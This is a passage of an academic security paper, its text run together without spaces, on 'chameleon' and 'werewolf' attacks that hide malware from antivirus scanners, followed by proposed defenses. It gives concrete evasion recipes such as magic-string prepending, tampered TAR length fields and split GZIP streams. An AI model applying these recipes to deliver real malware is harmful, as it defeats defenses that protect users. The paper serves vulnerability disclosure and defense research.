Inallattacks,tomasqueradeasaparticulartypeweusedClamAV'smagicstringifsupportedbyClamAV,otherwiseastringfromTableXIVintheappendix.
Sampleattack:makingaTARarchivelooklikemirc.
iniWedescribeasampleexploitagainstClamAVinwhichaPOSIXTARlemasqueradesasa'mirc.
ini'le.
Theirle-typesignaturesaredisjointandthesignatureof'mirc.
ini'ismatchedbeforethesignatureofTAR.
Itremainstoensurethataddingthe'mirc.
ini'signaturetoaTARledoesnotaffecttheprocessingofthearchivebythetarprogram.
TableXIIIsaysthatthesignatureof'mirc.
ini'beginsatoffset0andendsatoffset9.
Thusthe09bytesoftheinputTARlemustbechangedto'5b616c69617365735d'.
Becausetheinitial100bytescontainthenameoftherstle,therst9bytesofthisnamewillchangeasasideeffect.
Thisdoesnotaffectthearchive'scontentsandanyvirusinfectinganyleinthearchivewillbefreetospread.
WeconvertedthismasqueradeexploitintoaworkingchameleonattackusingthetestEICARvirus[11],whichisdetectedbyallantivirusscanners,includingClamAV.
Iftherst9bytesofaTARarchivecontaining'eicar.
com'aredirectlychangedto'5b616c69617365735d'('[aliases]'inASCII),thetarapplicationconsidersthearchivecor-ruptedbecausethenamesofallmemberlesarepartofachecksum-protectedheaderblock.
Toavoidthisissue,itissufcienttorename'eicar.
com'to'[aliases].
com'andputitinsidetheTARarchive.
ClamAVdoesnotrecognizetheleasanarchiveandscansitasa"blob,"lookingfortheEICARsignatureonlyatoffset0andfailingtodetectitinthemiddleofthele.
AnotherapproachistouseaTARmanipulationlibrarytochangethechecksum,butthisisnotnecessaryherebecausethefakele-typesignature'[aliases]'onlycontainsASCIIcharacters.
Sampleattack:user-repairedarchive.
Theapplicationontheendhostisoftencapableofrepairingthemodiedle(thisiscommoninarchivingprograms).
Insomecases,itmayprompttheuserwhethershewantstorepairthele.
Mostusersanswer'Yes'tothesequestions.
GivenaRARarchivewithanEICAR-infectedle,wechangedthersttwobytesto"MZ,"whichisthemagicidentierforWindowsexecutables.
Noneofthetestedscannersdetectedtheinfectioninthemodiedarchive,yetTableXSUCCESSFULCHAMELEONATTACKS.
FormattypeFileformatNo.
ofattacksCVEnon-archiveELF32012-1429,2012-1430,2012-1431PE52012-1432,2012-1433,2012-1434,2012-1435,2012-1436MSOfce9722012-1437,2012-1438archiveTAR102012-1419,2012-1420,2012-1421,2012-1422,2012-1423,2012-1424,2012-1425,2012-1426,2012-1427,2012-1428RAR12012-1443theRARprogramontheendhostrepaireditandcorrectlyextractedtheinfectedle.
Thisisespeciallysurprisingbecausethisparticularattackisanecdotallyknown[2].
Sampleattack:exploitingregex-basedle-typeinference.
Torecognizecertainformats,ClamAVusesregularexpres-sionstomatchmagicstringsthatcanoccuranywhereinale,inadditiontolookingformagicstringsatxedoffsets.
Wedescribetwosampleattacksonthiscombinationofxed-offsetandregex-basedinference(testedagainstClamAVonlyandthusnotcountedinTableX).
ZIParchivesmaystartwitharbitrarybytes.
Torecog-nizeZIPles,ClamAVusesbothaxed-offsetsignature'504b0304'atoffset0andaregexsignature'504b0304'whichcanappearatanyoffsetwithintheinputle.
Onceaformathasbeenrecognizedaccordingtothexed-offsetsignature,ClamAVdoesnotdoanyfurtherinference—evenifthereareregexmatchesinsidethele.
Toexploitthis,wecreatedaZIPlecontainingaCassini-infectedexecutableandprependedthestring'504b0304'toit.
ClamAVmatchedthexed-offsetsignatureatoffset0butfailedtonoticetheregexsignatureatoffset4,wasthusunabletoextractthecontentscorrectly,anddeclaredthearchiveclean.
Thedestinationapplication(unzip)ignoredtheinitialbytesandextractedtheinfectedle.
ThesecondattackexploitsthefactthatClamAVig-noreslesofcertaintypes(e.
g.
,MPEGvideoandOggVorbisaudio)becausetheyarenotaffectedbyanymajorviruses.
WecreatedaCABarchivecontainingaCassini-infectedleandprependedthestring'000001b3'toit,whichisthexed-offsetMPEGsignature.
ClamAV'sle-typedatabasecontainsaregexsignatureforCABfor-mat—'4d534346'anywhereinthele,whichmatchesCABlesevenwithgarbageprepended—butClamAVdoesnotapplyregexsignaturesoncethexed-offsetsignaturehasbeenmatched.
Therefore,ClamAVinfersMPEGtypefortheleanddoesnotscanit,whilethedestinationapplication(cabextract)correctlyextractstheinfectedle.
VI.
WEREWOLFATTACKSWerewolfattackstamperwiththele'smeta-data,causingthedetectortoparseitincorrectlyand/orincompletely.
Incontrast,theOSorapplicationontheendhostusually"understands"theformatmuchdeeper(seeSectionVIII-A)andprocessesthelecorrectly.
TableXIshowsthateveryscannerwetestedisvulner-abletomultiplele-parsingattacks.
TableXIIsummarizestheheader-parsingdiscrepanciesfoundbyourdifferentialfuzzingframework.
Allofthemresultinsuccessfulwere-wolfattacks;therestwerefoundbymanualanalysis.
Below,weexplainsomeoftheattacks,usingClamAVasanexampleofanopen-sourcedetectorandMcAfeeasanexampleofaclosed-sourcedetector.
TableXISUCCESSFULWEREWOLFATTACKS.
FormattypeFileformatNo.
ofvulnerableAVsCVEnon-archiveELF122012-1463CHM22012-1458archiveZIP202012-1456TAR292012-1457TAR352012-1459TGZ82012-1460TGZ202012-1461ZIP122012-1462TableXIIHEADER-PARSINGERRORS(ALLRESULTINWEREWOLFATTACKS).
FormattypeFormatHeadereldsNo.
ofvuln.
AVsCVEnon-archiveELFpadding42012-1439identsize52012-1440class112012-1442abiversion42012-1444abi42012-1445encoding142012-1446eversion42012-1447eiversion62012-1454PEeminalloc+13others22012-1441eipanderes12012-1441archiveCABcbCabinet52012-1448vMajor22012-1449reserved332012-1450reserved222012-1451reserved132012-1452coffFiles142012-1453vMinor22012-1455A.
SamplewerewolfattacksonarchivelesWrongchecksum.
InaPOSIXTARarchive,eachmemberlehasa512-byteheaderprotectedbyasimplechecksum.
Allheadersalsocontainalelengtheld,whichisusedbytheextractortolocatethenextheaderinthearchive.
Mostscannersdonotusethechecksumeldwhenparsinganarchive.
Thisisreasonablebecauseavirusmaylurkeveninanarchivewhosechecksumiswrong,butinthiscasethescannersaretoosmartfortheirowngood.
OursampleattackusesaTARarchivewithtwoles:therstoneisclean,whilethesecondisinfectedwiththetestEICARvirus.
Thelengtheldintheheaderoftherst,cleanlehasbeenmodiedtopointintothemiddleoftheheaderofthesecond,infectedle(seeFigure2).
Scannersthatdonotverifythechecksumeldareunabletondthebeginningofthesecondheader.
35ofthe36testedscannersfailtodetecttheinfectioninthemodiedarchive(theonlyexceptioniseSafe7.
0.
17.
0).
Incontrast,taronLinuxdiscoversthatthechecksumisinvalid,printsoutawarning,skipstherstheader,ndsthesecond,infectedlebysearchingforthemagicstring"ustar,"andproceedstoextractitcorrectly.
chksumlengthchksumlengthchksum(corrupt)lengthchksum(benign)lengthheader1header2header1header2file1file2file1craftedTARarchiveregularTARarchivefile2(infected)Figure2.
AcraftedTARarchivewiththemodiedlengtheldintherstheader.
Misleadinglength.
IfthelengtheldintheheaderofaleincludedintoaTARarchiveisgreaterthanthearchive'stotallength(1,000,000+originallengthinourexperiments),29outof36scannersfailtodetecttheinfection.
OneofthevulnerablescannersisMcAfee,whichhasthedefaultupperlimitof1MBonmemoryforloadingale.
Sincethesizespeciedintheheaderisgreaterthan1MB,McAfeedeclarestheleclean.
GNUtarprintsawarningbutextractstheinfectedcontentscorrectly.
Multiplestreams.
GZIPlescancontainmultiplecom-pressedstreams,whichareassembledwhenthecontentsareextracted.
Thisfeaturecanbeusedtocrafta.
tar.
gzlewiththeEICARtestvirusbrokenintotwoparts.
20outof36scannersfailtodetecttheinfection.
Whenthecontentsareextracted,theinfectedleiscorrectlyreassembled.
Forexample,McAfeesimplyignoresallbytesaftertherststreamofcompresseddata.
EvenifanotherinfectedleisappendedtoaGZIPlecontainingmultiplecompressedstreams,McAfeefailstodetecttheinfection.
Randomgarbage.
IfaZIParchivehasgarbagebytesinthebeginning,theunzipprogramskipsthesebytesandstillextractsthecontentscorrectly(weusedZip3.
0andUnZip6.
00inUbuntu10.
04forthistest).
12outof36scannersfailtodetecttheinfectioninaleconsistingof1024bytesofrandomgarbagefollowedbyanEICAR-infectedZIPle.
Notethatthelestillhastheproper.
zipextension.
RandomgarbageattheendofavalidGZIParchivedoesnotaffectthegzipprogram,whichsimplyignoresitwhenextractingthecontents.
Yet,givenanEICAR-infected.
tar.
gzlewith6randombytesappended,8outof36scannersfailtodetecttheinfection.
Ambiguouslesconformingtomultipleformats.
Flex-ibilityofmanyleformatsenablesanattackertocreatewerewolflesthatcanbecorrectlyparsedaccordingtomorethanoneformatandproducedifferentresults.
GiventhatzipcorrectlyparsesZIParchiveswithgarbageprepended,whiletarcorrectlyparsesTARarchiveswithgarbageappended,wecreatedawerewolfleconsistingofaTARarchivefollowedbyavirus-infectedZIParchive.
Thislecanbeprocessedeitherbytar,orbyzipanddifferentcontentswillbeextracteddependingonwhichprogramisused.
20outof36scannersfailtodetecttheinfection.
OtherwerewolflesthatcanbeparsedaccordingtomultipleformatsareCAB-TAR,ELF-ZIP,andPE-CAB.
Someofthesepairsincludenon-archiveformats!
B.
Samplewerewolfattacksonnon-archivelesWerewolfattacksarealsoeffectiveagainstexecutables,Ofcedocuments,andCHMles.
Manymodernleformatsaresimilartoarchivesbecausetheycancancontainem-beddedobjectsofdifferenttypes.
Thismakesparsingmuchharderandopensthedoortowerewolfattacks.
Fakeendianness.
InmostELFles,the5thbyteoftheheaderindicatesendianness:01forlittle-endian,02forbig-endian.
Linuxkernel,however,doesnotcheckthiseldbeforeloadinganELFle.
Ifthe5thbyteofaBliss-infected,little-endianELFleischangedto02,12outof36scannersfailtodetecttheinfection.
EmptyVBAprojectnames.
MSWordlesmaycontainembeddedobjectssuchasexecutablemacros,images,etc.
Becausevirusescanexploittheauto-executionfeature,de-tectorstrytorecognizeandscanmacrosinthedocument.
Inthisexample,wefocusonhowClamAVdoesthis.
InMSdocuments,macrosaregenerallystoredinsideVBA(VisualBasicforApplication)projects.
AgroupofVBAprojectsisidentiedbyatwo-bytesignature,"cc61";eachprojectinagrouphasanuniqueunicodename.
Cla-mAVrstiteratesthroughtheVBAprojectnamestreatingthedataaslittle-endianandchecksiftheresultingnamesarevalid(havepositivelengthandbeginwith"*\g","*\h","*\",or"*\d").
Ifaninvalidnameisfound,ClamAVstops.
ClamAVstoresthenumberofvalidprojectnamesitfoundintherstpassandrepeatsthesameprocess,butnowassumingthatthedataarebig-endian.
Finally,ClamAVcomparesthenumberofstringsfoundduringthetwopasses.
Iftherstnumberisgreaterthanthesecond,ClamAVtreatstheleaslittle-endian,otherwise,asbig-endian.
WecreatedanABC-infectedWordleinwhichtherstVBAprojectnameisemptybuttheothernamesareintact.
Whenparsingprojectnames,ClamAVcalculatedthevalidnamecounttobe0inbothlittle-endianandbig-endiancasesandfailedtodetecttheinfection.
Ontheotherhand,destinationapplications(MSOfce2007andOpenOfce)openthedocumentcorrectlyandexecutetheinfectedmacroseventhoughtherstprojectnameisempty.
Incorrectcompressionresetinterval.
AWindowsCom-piledHTMLHelp(CHM)leisasetofHTMLles,scripts,andimagescompressedusingtheLZXalgorithm.
Forfasterrandomaccesses,thealgorithmisresetatintervalsinsteadofcompressingtheentireleasasinglestream.
ThelengthofeachintervalisspeciedintheLZXCheader.
Iftheheaderismodiedsothattheresetintervalislowerthanintheoriginalle,thetargetapplication(inthiscase,WindowsCHMviewerhh.
exe)correctlydecompressesthecontentlocatedbeforethetamperedheader.
Ontheotherhand,severaldetectors(includingClamAV)attempttodecompresstheentireCHMlebeforescanningitformalware.
Whentheyfailtodecompressthecontentslocatedafterthetamperedheader,theydeclaretheletobeclean.
Bypassingsection-specicsignatures.
ClamAVusessection-specichashsignatureswhenscanningWindowsexecutables.
TheycontaintheoffsetandthelengthofasectionoftheleandthevalueofitsMD5hash.
85%ofsignaturesinClamAV'scurrentdatabaseareofthistype.
IfClamAV'sparsermistakenlybelievesthattheexecutableiscorruptorcontainssomeunsupportedfeatures,ClamAVskipsthesection-specichashsignatures,enablingevasion.
VII.
DEFENSESAGAINSTCHAMELEONATTACKSSimplisticsolutionssuchaschangingtheorderinwhichmagicstringsarematchedmayaddressthespecicvul-nerabilitieswefoundbutwillundoubtedlyintroducenewones.
Onegenericdefenseagainstallchameleonattacksistorecognizelesthatmatchmultipletypesandprocessthemforallmatchingtypes.
Thismayopenthedoortodenialofserviceiftheattackeroodsthedetectorwithlescontainingalargenumberofmagicstrings.
Topreventthis,thedetectorshouldrejectleswithanabnormallyhighnumberofpossibletypes,butthisonlyworksforxed-offsetmagicstrings.
Checkingwhetherthelematchesmorethanacertainnumberofregularexpressionscanstillimposeanunacceptableoverheadonthedetector.
Anotherapproachisnormalization:thedetectorcanmod-ifytheletoensurethattheendhost'sinterpretationofitstypematchesthedetector's.
InWindows,leextensiondeterminesbydefaultwhichprogramisusedtoopenit.
InLinux,desktopmanagerssuchasKDEandGNOMEuseextensionsastherstheuristicandfallbackonmagicstringsifthelehasanunknownextensionornoextensionatall.
Unfortunately,rewritingtheextensionisnotafailproofdefenseagainstchameleonattacksbecauseitdoesnotguar-anteethattheendhost'sbehaviormatchesthedetector'sexpectations.
First,usersmayoverridethedefaultsettingsinbothWindowsandLinuxandchooseanyprogramtoopenanyle.
Second,forendhostsrunningLinux,thedetectormustbeawareofthelistofknownextensions:ifthenormalizedextensionisnotonthelist,chameleonattacksmaystillsucceedevenwiththedefaultsettings.
VIII.
NETWORK-BASEDDEFENSESAGAINSTWEREWOLFATTACKSNomatterwhattechniqueanetwork-baseddetectorisusing—scanningforvirussignatures,emulatedexecution,behavioralanalysis,etc.
—itmustrstrecognizethetypeoftheleandparseitcorrectly.
Evenbehavioraldetectiondoesnothelpifthedetectorisunabletondexecutablecodeinamaliciouslycraftedleandthuscannotexecuteit.
Becausenetwork-baseddetectorsdonotobservetheactualprocessingand/orexecutionoftheleontheendhost,theymustguesshowtheendhostmayprocessthele.
Ifanetwork-baseddetectorisprotectingmultipleendhosts,itmustguesscorrectlyforallofthem.
Intherestofthissection,wearguethatthisisextremelyerror-prone.
A.
"Writeabetterparser"Theobviousdefenseagainstwerewolfattacksistoensurethatthemalwaredetectorparseseachleexactlythesamewayasthele'sdestinationapplicationorOS,thuselim-inatingthe"semanticgap.
"Note,however,thatdetectorsdeployedonmailservers,networkgateways,asacloud-basedservice,etc.
aimtobenetfromeconomiesofscaleandtypicallyprotectmanyhostswithadiversesetofapplicationsinstalledonthem.
Topreventwerewolfattacks,themalwaredetectormustparseeachleinmultipleways,oneforeverypossibledestinationapplicationandOS.
Thedetectormust(1)knowallapplicationsthatmaypossiblybeusedonanyoftheendhoststoaccessthele,(2)knoweveryapplication'sparsinglogic,(3)preciselyreplicatethislogicwithinthedetectorforallpossibleinputs,includingdamagedandnon-compliantles,(4)replicateeveryknownandunknownbugineveryapplication'sparsingalgorithm,and(5)bepromptlyupdatedwithanewalgorithmwheneveranapplicationisinstalledorupdatedonanyendhost.
Format-compliantparsingisnotenough.
Formatspeci-cationsprescribehowtoparsecorrectlyformattedles.
Inpractice,however,manylesdonotfullyconformtothespecication,thus(1)applicationsaredesignedtohandleevennon-compliantles,and(2)blocking"malformed"lesislikelytorenderthedetectorunusablebecauseoffalsepos-itives.
Manyformatsdonotdenewhatitmeansforaletobe"well-formed,"causinglescreatedbylegitimateappli-cationstoappearmalformed.
Forexample,upto68%ofPEexecutableimagesinthewildhavestructuralanomaliesanddonotconformtothePEformatspecication[29].
FormatslikePDFhavenouniversallyrecognizednotionofvalidityandevenconformancebenchmarksacceptmalformedandcorruptles[14].
Furthermore,everyapplicationparsesnon-compliantlesinitsownidiosyncraticway,resultingindifferentoutputsforthesameinput(seeFig.
3).
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111A3A1A2producesvalidoutputithapplicationAi:inputsfromwhichformatcompliantinputsFigure3.
Parsingdiscrepancies.
LetIbethesetofallpossibleleinputs,Othesetofpossibleoutputs,andSf:IS→OSthespecicationforformatf,whereISIandOSO.
AnidealprogramPidealwouldonlyproduceanoutputforcompliantinputs:Pideal(x)=Sf(x)ifx∈ISErrorifx∈IISInpractice,however,applicationshavetodealwithnon-compliantinputsthatlieinIIS.
AnyrealprogramPrealhasitsidiosyncraticwaySdofparsingnon-compliantles:Preal(x)=Sf(x)ifx∈ISSd(x)ifx∈IdwhereSd:Id→OSErrorifx∈I(IS∪Id)SupposetherearenprogramsP1,P2,Pnforprocess-ingformatf.
ThedetectorAVdoesnotknowwhichofthemwillbeusedontheendhostandmustproduce:AV(x)=Sf(x)ifx∈ISSd1(x)Sdn(x)ifx∈Id1.
.
.
∪IdnErrorifx∈I(IS∪Id1.
.
.
∪Idn)Buildingsuchaparserisverydifcult.
Forexample,specicationsofarchiveformatsusuallydonotsaywhattodowhensomememberlesaredamagedormalformed(e.
g.
,haveinvalidchecksums).
Someapplicationsextractonlythevalidles,othersgenerateanerror,yetothersattempttorepairthedamageorsimplyignoretheinvalidchecksums.
Critically,manyapplicationsproduceusableoutputsevenfortheinputlesthatareinvalidaccordingtotheformatspecication.
Detectorsdonotparseinthesamewayasapplications.
First,theparsingfunctionalityofapplicationsismuchricherthanthatofmalwaredetectors.
Detectorsonlyimplementthebareminimumneededtoanalyzealeformalware.
Intheaboveexample,manydetectorsignorechecksumsinarchivesbecausetheirgoalistondhiddenmalwarecode,notverifyleintegrity.
Atrstglance,aparserthatignoreschecksumsseemssafebecause,intheory,itshouldacceptstrictlymoreinputsthanaparserthatverieschecksums.
AsweshowinSectionVI,thisisnottrue!
Ignoringchecksumsintroducessubtleparsingdiscrepanciesbetweentheparserandtheapplicationandenableswerewolfattacks.
Second,applicationsoftenhavebugsintheirle-parsingcode.
Thedetectormustreplicateeveryknownandunknownparsingbugineveryapplicationthatcouldbeusedonanyendhosttohandlethele.
Third,manyformatspecicationsareincompleteand/ornondeterministic.
Asaconsequence,differentapplicationsmakedifferentchoicesandparseeventhesamecompliantleindifferentways.
Forexample,parsingofPDFlesisnotoriouslyloose[14,26].
Fourth,specicationsofproprietaryleformatsareoftenclosed-sourceandchangewitheveryreleaseoftheapplica-tion,makingitinfeasiblefortheimplementorsofmalwaredetectorstokeepup.
Itishardtoreplicatetheapplication'sparsinglogic.
Evenwithaccesstotheapplication'sparser,itisdifculttowriteanotherparserthatexactlyreplicatesitsbehavioronallpossibleinputs.
Forexample,after12yearsofbug-xingtherearestillmanyle-parsingdiscrepanciesbetweenthe"functionallyequivalent"busyboxandcoreutilversionsofUnixutilities[7].
238outof743compatibilitybugsbetweenOpenOfceandMSOfcearecausedbyleprocessing[24]andevenafterasignicantreverse-engineeringeffort,faith-fulreplicationofparsingremainsachallenge[23].
Ingeneral,completereplicationoftheinput-outputbehav-iorisinfeasibleformostnon-trivialsystems.
Non-parsingexamplesincludedifferencesbetweenOSimplementationsofthesamenetworkprotocolstack(exploitedbyNmap)anddifferencesbetweenmonitoredandunmonitoredexecutionenvironments(exploitedbysplit-personalitymalware[8]).
Samelecanbeparsedaccordingtodifferent,contra-dictoryformats.
Manyleformatsareexibleenoughthatanattackercancraftasinglelewhichisvalidaccordingtomultipleleformatsandcanbecorrectlyparsedinmultipleways.
Forexample,asmentionedinSectionVI,awerewolfleconsistingofavalidTARarchivefollowedbyavalidZIParchivecanbeprocessedeitherbytar,orbyzipandwillproducedifferentresultsdependingonwhichprogramisused.
Similarattacksarepossibleforotherformatpairs,suchasELFandZIPorPEandCAB.
Thedetectormustdetermineallpossibleformatswithwhichthelemaybecompatible,and,foreachformat,parsetheleinallpossiblewayssupportedbyallapplicationsdealingwiththisformat.
Evenifthiswerefeasible,itislikelytoimposeanunacceptableperformanceoverhead.
Detectormustkeepanup-to-datelistofallapplicationsonallprotectedendhosts.
Evenifthedetectorwerecapableofaccuratelyreplicatinghundredsofdifferentle-parsingalgorithms,itmustknowwhichalgorithmstoapply.
Todothis,thedetectormustknowwhichapplicationsmayhandletheleofanyoftheprotectedendhostsatanygiventime,anditsparsinglogicmustbepromptlyupdatedwheneveranewversionofanyapplicationisinstalledonanyendhost.
Inmanycases—forinstance,whenthedetectorisrunningonamailserver—thecompletesetofprotectedapplicationsmaynotevenbeknown.
Forexample,oneofourwerewolfattacksinvolvesaTARarchivewithasingleleandamalformedheaderspecifyingasignicantlylargerlengththantheactualsizeofthele.
WetestedthreedifferentLinuxapplications:GNUtar1.
22,7-Zip9.
04beta,andFileRoller2.
30.
1.
1.
7-Zipwasnotabletoextractthecontents.
GNUtarextractedthecontentswithan"unexpectedEOF"warning.
Surprisingly,FileRoller,whichisaGUIfront-endforGNUtar,failedtoextractthecontents.
FurtherexaminationrevealedthateventhoughGNUtarextractscorrectly,itreturns2insteadoftheusual0becauseitreachedtheendoflemuchearlierthanitwasexpectingbasedonthelengtheldoftheheader.
ThiscausesFileRollertoproduceanerrormessage.
Fileparsingisversion-dependenteveninthesameappli-cation.
Forexample,GNUtaruptoversion1.
16supportedustartypeNheaderlogicalrecords,butlaterversionsofGNUtarnolongerdo.
Itishardtoupdateparsingcode.
Addingormodifyingaleparserisnotnearlyassimpleasaddinganewvirussig-nature.
Allsignaturesshareacommonformat,thusagenericsignature-matchingengineisusuallycapableofhandlingbotholdandnewsignatures.
Addingnewsignaturesdoesnotrequireanychangestothesignatureformatorthescanningcode.
Parsers,ontheotherhand,mustbeimplementedbyhandandmanuallyupdatedafteranychangeintheparsinglogicofanyoftheprotectedapplications.
Normalizationisnoeasierthanparsing.
Normaliza-tion—rewritinganon-compliantlesothatitcomplieswiththeformatspecication—mayhelpindefeatingwerewolfattacks.
Unfortunately,itrequiresparsingthelerstandthusfacesalltheproblemsoutlinedabove.
Forexample,considernormalizinganarchivetoremoveinvalidles.
Thedetectormustparsethearchivetondindividuallesanddeterminetheirvalidityaccordingtothespecicationofeachle'sformat.
Thisisextremelyerror-prone.
Supposethatperspecication,the5thbyteofthelecontainstheformatversionnumber.
Nowthedetectormustkeeptrackofvalidversionnumbersforeachformat,andsoon.
Thenotionofvalidityvariesdramaticallyfromletole,withdifferentpartsoftheheaderandcontentusedforthispurposeindifferentformats.
Thismakesnormalizationinfeasibleforallbutthesimplestformats.
B.
DonotparselesinthedetectorAnalternativetoparsingistosubmiteachletoavirtualenvironmentthatletsitbeparsedbytheactualapplicationorloadedbytheguestOS,thentriestodetectmalwarefromoutsidetheOS(e.
g.
,usingvirtual-machineintrospection[13]).
Thisapproachdefeatschameleonandwerewolfattacksonlyifallofthefollowinghold:(1)theguestOSandapplicationsareexactreplicasoftheprotectedendhost;(2)iftherearemultipleendhostcongurations(e.
g.
,ifdifferenthostsmayusedifferentapplicationsorversionsofthesameapplicationtoaccessagivenle),everycongurationisreplicatedexactly;(3)theanalysisenvironmentexactlyreplicateshumanbehavior,includinguserresponsesto"repaircorruptedle"messages;and(4)theenvironmentisnotvulnerabletosplit-personalityevasion[8].
Productiondeploymentofnetwork-orcloud-basedmalwaredetectorsthatsatisfyalloftheserequirementsisahardproblembeyondthescopeofthispaper.
C.
DefendindepthManyattacksaredetector-specic,thusapplyingmul-tipledetectorstothesamele—asadvocatedbyClou-dAV[21]—mayprovidebetterprotection,atasignicantperformancecost.
Someofourattacks,however,evadedall36testedAVscanners.
Furthermore,severalnon-interferingattackscanbecombinedinasinglele,enablingittoevademultipledetectors.
IX.
HOST-BASEDDEFENSESAGAINSTWEREWOLFATTACKSOneofthemainpurposesofnetwork-baseddeploymentofmalwaredetectorsistoreducetheneedforhost-baseddetection.
Nevertheless,wediscusshost-baseddefensesforcompleteness.
Host-basedtechniques—suchascontinuouslyscanningthememoryforsignsofmaliciousbehavior—areeffectivebecausethedetectoroperatesduringorafterthelehasbeenprocessedandthusdoesnotneedtoindependentlyreplicatetheresultsofleprocessing.
Therefore,host-baseddetectorsarebetterequippedtodealwithchameleonandwerewolfattacks.
Inpractice,however,manyarevulnerabletothesameattacksastheirnetwork-basedversions.
A.
On-accessscanningAtypicalon-accessscannerinterceptsle-open,le-close,andle-executesystemcallsandscanstheirtargetsforinfection.
On-accessscannersareeffectiveagainstwerewolfattacksonarchiveformatsonlybecausetheydonotneedtoparsearchives.
Aftertheuserhasextractedthecontents,shewilltrytoopenand/orexecutethem.
Atthispoint,thescannerinterceptstheopen/executesystemcallanddetectsthevirusbeforeanyharmisdone.
Thisisaspecialcasewheretheresultsofparsing(i.
e.
,theextractedles)arestoredinthelesystemandthusaccessibletothescanner.
Unfortunately,asweshowinthispaper,werewolfattacksaffectnotonlyarchiveformats,butalsoELF,PE,andMSOfce(amongothers).
Fortheseformats,existingon-accessscannersdonothaveaccesstotheinternaldatarepresentationaftertheOSorapplicationhasparsedtheleandmustrelyontheirownparsing,openingthedoortowerewolfattacks.
Forexample,on-accessscanninginClamAVusesaLinuxkernelmodulecalledDazukothatscansthetargetlesofopen,close,andexecsystemcalls.
Inourexperiments,ClamAVsuccessfullydetectedaninfectedleunpackedfromamalformedarchiveintothemonitoreddirectory,butfailedtodetectaninfectedWordlewithanemptyVBAprojectname(seeSectionVI-B)evenwhenopenedbyOpenOfcefromthesamedirectory.
B.
TightintegrationwithapplicationsWhenrunningonthehost,amalwaredetectorcanbenetfromtighterintegrationwiththele-processinglogicoftheOSandapplications.
OneplausibleapproachisfortheOSandapplicationimplementorstorefactortheircodesothatthedetectorcanbeinvokedinthemiddleofleprocessingandgivenaccesstotheresultsofparsing.
Unfortunately,thisapproachisinsecureagainstmalwarethatexploitsvulnera-bilitiesintheparsingcodeitself.
Forexample,adetectorthatwaitsuntiltheJPEGlibraryhasparsedaJPEGlebeforecheckingthattheleissafecannotprotectthelibraryfrommaliciousJPEGsthatusebugstotakeitover,defeatingthepurposeofmalwaredetection.
Furthermore,tightintegrationbetweenapplicationsandexternalfunctionalitywhichisnotintegraltothetheiroperationaddscomplexityandiscontrarytotheprinciplesofmodularsystemdesign.
Figure4.
Applicationrefactoringtomitigatewerewolfandchameleonattacksonhost-andcloud-basedmalwarescanners.
Privilegeseparationcanhelpsolvethis"chickenandegg"dilemmaiftheapplicationisrefactoredsothattheparsingcoderunsatlowerprivilegethantherestoftheapplication.
Theparsercaninvokeahost-orevencloud-basedmalwaredetectorandsendtheresultsofparsingforscanning,asshowninFig.
4.
Afterthedetectordeclaresthemclean,theyarepassedontotherestoftheapplication.
Thisarchitectureavoidstheneedtoreplicateapplication-specicparsinginthedetector.
Evenifmalwareexploitsavulnerabilityintheparser,itwillonlygaintheabilitytoperformlow-privilegeoperationsthattheparserisallowedtoperform.
Implementingthisarchitecturerequiresthattheantivirusvendorssupportastandardizedinterfacethroughwhichap-plicationscansubmitparseddataforanalysis.
SomeexistingarchivingapplicationssuchasWinRARandWinZipsupportinvocationofcommand-lineantivirusscanners,butthisfunc-tionalityisnotyetavailableinnon-archivingapplications.
Anotherapproachisfortheapplicationandthedetectortousethesameparsingcode,e.
g.
,byemployingthesameparsinglibrary.
Forinstance,multiple-streamsandrandom-garbageattacksdonotworkagainstClamAVbecauseClamAVusesthelibzlibraryforparsingGZIPles.
Theoriginsoflibzaresimilartogzip,thusClamAVeffectivelyusesthesameparsingcodeastheapplication.
ThisapproachsuffersfrommostoftheawsoutlinedinSectionVIII-A—thedetectormustknowexactlywhichparsingcodeisusedbytheapplicationandmustbeupdatedwhenevertheapplication'sparsinglogicchanges—buttheseawsmaybeeasiertomitigateinahost-baseddeployment.
X.
CONCLUSIONWepresentedtwoclassesofpracticalattacksagainstau-tomatedmalwaredetectors.
Theyenableevenunobfuscated,easilyrecognizablemalwaretoevadedetectionbyplacingitinspeciallycraftedlesthatareprocesseddifferentlybythedetectorandtheendhost.
All36antivirusscannersinourexperimentaltestingprovedvulnerabletotheseattacks,yieldingatotalof45differentexploits,almostallofwhicharereportedhereforthersttime.
Theresthavebeenknownonlyanecdotallyandneverbeensystematicallyanalyzed.
Wearguethatsemanticgapsinleprocessingareafunda-mentalawofnetwork-andcloud-basedmalwaredetectors,regardlessoftheactualdetectiontechniquetheyuse.
Aslongasthedetectoranalyzeslesonitsown,independentlyoftheactualoperatingsystemsandapplicationsontheendhosts,itfacestheinsurmountablechallengeofcorrectlyreplicatingtheirle-processinglogiconeverypossibleinput.
Developmentofmalwaredetectorsthatdonotsufferfromthisgap—forexample,iftheyoperateonexactvirtualcopiesofprotectedsystemsthatprocesseachleusingtheactualapplicationsandfaithfullyemulatehumanresponse,oriftheyareintegratedwiththeparsinglogicofactualapplications—isaninterestingtopicforfutureresearch.
Acknowledgments.
TheresearchdescribedinthispaperwaspartiallysupportedbytheNSFgrantsCNS-0746888andCNS-0905602,Googleresearchaward,andtheMURIprogramunderAFOSRGrantNo.
FA9550-08-1-0352.
REFERENCES[1]S.
Alvarez.
Antivirusinsecurity.
http://events.
ccc.
de/camp/2007/Fahrplan/attachments/1324-AntivirusInSecuritySergioshadownAlvarez.
pdf,2007.
[2]S.
AlvarezandT.
Zoller.
ThedeathofAVde-fenseindepth-revisitinganti-virussoftware.
http://cansecwest.
com/csw08/csw08-alvarez.
pdf,2008.
[3]avast!
Anti-virusenginemalformedZIP/CABarchivevirusdetectionbypass.
http://secunia.
com/advisories/17126/,2005.
[4]A.
Barth,J.
Caballero,andD.
Song.
Securecontentsnifngforwebbrowsers,orhowtostoppapersfromreviewingthemselves.
InS&P,2009.
[5]D.
Bates,A.
Barth,andC.
Jackson.
Regularexpres-sionsconsideredharmfulinclient-sideXSSlters.
InWWW,2010.
[6]D.
Brumley,J.
Caballero,Z.
Liang,J.
Newsome,andD.
Song.
Towardsautomaticdiscoveryofdeviationsinbinaryimplementationswithapplicationstoerrorde-tectionandngerprintgeneration.
InUSENIXSecurity,2007.
[7]C.
Cadar,D.
Dunbar,andD.
Engler.
KLEE:Unassistedandautomaticgenerationofhigh-coveragetestsforcomplexsystemsprograms.
InOSDI,2008.
[8]X.
Chen,J.
